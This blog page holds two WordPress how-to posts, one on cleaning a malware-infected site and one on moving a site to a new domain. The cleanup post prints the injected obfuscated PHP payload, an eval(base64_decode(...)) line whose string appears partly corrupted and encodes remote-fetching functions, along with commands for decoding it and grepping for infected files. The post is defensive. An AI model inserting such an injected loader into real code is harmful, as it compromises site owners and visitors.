wordpress

How to clean malware infected WordPress blogs

Yes, that happened to me. I had a pretty old version of WordPress for one website and it got attacked by somebody. From what I could tell it was an automated attack and it infected most of the .php files for the same user on the hosting.

How I found out about that was when I opened the website in Chrome a warning was shown instead of the website:

 

Note: You can also perform a free scan via Sucuri which will confirm if your website is infected and it also offers ways to clean it up.

The following will be reported if infected:

Don’t panic, investigate!

First thing I did is panic. After panicking for ~5 minutes I realized that I should calm down and start investigating the issue and how many of my websites are affected. I opened all of them in Chrome and only 3 were infected. I opened the source code to see what the code looks like that is causing problems. Note: DO NOT OPEN THE INFECTED LINK, it will infect your machine (especially if you are on Windows).

The code was a path to the infested website enclosed in <script> tags. Nothing was shown in Firefox though, that is why I didn’t see the problem earlier. I assume Firefox has some built-in protection against scripts to external hosts.

Next step was to open the .php files on my server and see the code that is producing the script to the external website. It was on top of the file and it was base64 encoded string, which looked like this:

/**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYJF9TRVJWRV
JbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbkk5Y3VybF83
NzcoJHVybCk50ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl8Nz
coJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9zb2NrBlb
l83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRy2tl
dF83NzcoJHVybCk7aWYoJbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICgIGZ1bmNttr
0aW9uIHRyeWN1cmxKCR1cmwpe2lmKGZas1bmN0aW9uXsf2V4aXN0cygnY3Vybyk9PT1mYWxzZSlyZX
R1cm4gZmFsc2U7JGNoID0gYl0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO
2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICg
VUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZ
XN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR
1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZ
nVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmggsdaefhyjhEgsrrgmV0dXJuI
CRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9
wZW4nKT09PWZhsfaXJldHVybiBmYWxzZTskYndfsdyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgK"));?>

If you are on a Linux machine or have Cygwin installed you can decode the string and see what it actually does by using the following command:

echo "ABOVE STRING GOES HERE" | base64 -d

Echo is used for security so that nothing is executed by mistake.

Make backups

Now that we know what the issue is, make a backup from the website and the database. Don’t worry that the files are still infected, better have infected files than no files at all in case something terrible happens 🙂

Unless you already have some method to create frequent backups, use simpler method now. Delete all the unwanted themes, plugins, empty cache if using caching plugin, then login to your hosting (S/FTP) and copy all the files from your host to your local machine. Login to your database and create full export of your database schema.

Clean-up

Unless you got Sucuri to perform the cleaning for you, these are some manual steps you can perform to clean your website.

1. Install a plugin to scan

There is a plugin called Exploit Scanner to scan your WordPress installation. It works for WordPress 3.3+ so if you have something older you will need to skip this step. If you have 3.3+, you can install it and perform a scan (in most cases default settings are good) which will inform you which files are (most likely) infected. There will be some legit decode/eval functions in the code, so you should just check for the ones that have base64 encoded strings (like explained above).

When the scan is completed you can see which files are infected and then you manually correct them.

2. Manually scan all the files

If you are on a Linux machine or have Cygwin on Windows you can execute the following to identify which files are infected

cd backedup_folder_from_above
find . | xargs grep -i decode

This will print all the files that have the word decode in them, and you will be able to recognize the infection by being on the top of the file with base64 encoded string. If you are not sure for some files, you can always check the encoded string by using the echo method explained above.

3. Manually remove the infected code

Now that we have identified which files are infected (either by the plugin or the manual scan), it is time to clean up the website. Modify the infected files by deleting the malware lines, in the example above from /**/ to php after the encoded string. If you modify the local files on the computer, when you are finished you need to upload them on the server to the correct paths and overwrite the existing ones. Easier way would be to open the files directly from the server (via your FTP client) modify them and save the changes.

When you are done with all the files and they are successfully uploaded on your server, perform another scan with Exploit Scanner and/or manual scan (note: for this second scan you need to create a new backup from the entire website in a new location and scan there). Make sure there are no infected files left.

Final steps

Now that the site is clean there are some final steps that must be performed so that you avoid problems like this in the future.

  1. Update your WordPress installation to the latest version
  2. Update all your plugins or at least the active ones
  3. Update your theme (please note, some themes when updated will overwrite all your custom code)
  4. Change your WordPress secret keys (get them here) in your wp-config.php file (more info here)
  5. Change the passwords for all the users in WordPress and make sure there are no new users created
  6. Change the password(s) on your database and change the password in wp-config.php as well
  7. Make sure the .htaccess file in the root directory of your blog has not been modified. Unless you have modified it, it should look like this
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Note: there could be something else added by your hosting, plugins etc, so double check before modifying it.

After you have done all these steps, go to Sucuri again and Re-Scan your site to make sure that everything is gone. If you are clean you need to get something like this:

That would be all, now go and write some posts on your clean blog 🙂

How to move your WordPress to a new domain name

As you might have noticed, there is a new domain name for this blog. Now the domain is http://redoem.com It is easier to remember and shorter than the previous one (http://blog.zasekoj.com).

The whole process took approximately 45 minutes, but yours could vary depending on the amount of posts, comments, images etc that you have.

NOTE: this is not for blogs hosted on wordpress.com. For them many of the steps will be different, but you can try and adapt the following.

OK, enough chit-chat, let’s get to work. First of all, of course, you need to buy a new domain name (I am using DreamHost – you can register as well for hosting and use coupon REDOEM30 to get 1 extra FREE lifetime domain registration and $30 off your total amount!).

  1. Create a new user in your panel (if the hosting does not do it automatically) which will have FTP access to your domain name.
  2. Remove all the junk that you do not need like spam comments pending, drafts you are not planning to use, themes that you don’t need etc. This takes additional space and there is no need to transfer it across different databases.
  3. Disable all the WordPress plugins and empty cache if you are using caching plugin
  4. Export your database
    • Login to your MySQL server (phpMyAdmin) and click on the Export tab
    • Select your database on the left of the screen (do not select the Information_Scheme database)
    • All of the settings by default should be OK, unless you are advanced user and you know what you are doing and what else you might need
    • Go to the bottom of the page and click the check box that says Save as file
    • Enter a template for your filename (the default is OK)
    • Leave the Compression set to None. It will cut few steps later
    • Click the Go button on the bottom-right and save the file to your disk
  5. Open the saved export file in a text editor which supports Find and Replace (like Notepad++, TextMate, GEdit etc)
  6. Find and replace all of the instances where your old domain name is used. NOTE: start with the longest string, for example db.olddomain.com would be replaced with db.newdomain.com, then go on to the lower lever by replacing olddomain.com to newdomain.com, and last just the domain name from olddomain to newdomain. Please be careful with this last one because it could change some of the things that you don’t want to be changed. I recommend to check which instances are they and either replace them one by one where needed or use extra filters. For example when I was doing this last bit I used /home/olddomain/ to /home/newdomain/ because that worked for me, see if such options will work for you too.
  7. If you want to change the database name, at the top of the file there should be a statement like “CREATE DATABASE namehere ….” change the name to whatever you want. Please note that later you will need this name.
  8. Save the file
  9. Login to your new MySQL Server (phpMyAdmin) for the new domain.
  10. Click Import and select the file that you modified. Click OK
  11. When the import is complete, you will receive a message stating that, if there are errors you will be informed as well. Now we will assume that it was successful.
  12. Login via (S)FTP to your olddomain where the WordPress installation is currently located
  13. Copy all the files (the wp-include, wp-content and wp-admin folders as well) from olddomain.com to your local disk (recommended) or directly to the newdomain (usually via SSH)
  14. Open the file wp-config.php in a text editor and modify the following fields:
    • define(‘DB_NAME’, ‘newdatabase’);  — this is the name from step 7
    • define(‘DB_USER’, ‘newdatabaseuser’);   — this is the user that you use to connect to the database/phpMyAdmin
    • define(‘DB_PASSWORD’, ‘newdbpass’);  — this is the password that you use to connect to the database/phpMyAdmin
    • define(‘DB_HOST’, ‘db.newdomain.com’);  — this is the hostname for the new database
  15. Transfer all the files to the newdomain.com folder
  16. Try to open the newdomain.com site — it should open successfully
  17. Reactivate all the plugins that you had previously, or the ones that you want one. Some of them might need to be re-configured to work on the new domain (SEO, Google Sitemap etc)
  18. Change any custom code that you have, like Google Analytics, Adwords etc
  19. Create a new file called .htaccess(note the dot at the beginning and no extension) for permanent redirect from the old site to the new site. This is important so that you don’t lose any traffic. However if you are losing the olddomain.com you cannot do this. Enter the following in it:
    Options +FollowSymLinks
    RewriteEngine on
    RewriteRule (.*) http://newdomain.com/$1 [R=301,L]
  20. Place the newly created file .htaccess inside the olddomain.com directory
  21. Remove all the files inside the olddomain.com directory (EXCEPT the .htaccess file that you added in step 20)
  22. Try the old site and see if the redirect works properly

Well, that was it. After all of these steps your WordPress installation should be moved to the new domain name and everything should stay the same. The redirect is very important (step 19) so make sure you keep your old domain for at least several more months after the move so that all the old traffic is redirected successfully. You can omit this step if you have a new site with very few visits, but then again I guess you can just create a new WordPress installation and do not perform the above steps 🙂

Enjoy and let me know in the comments if you have any problems.

 

Go to Top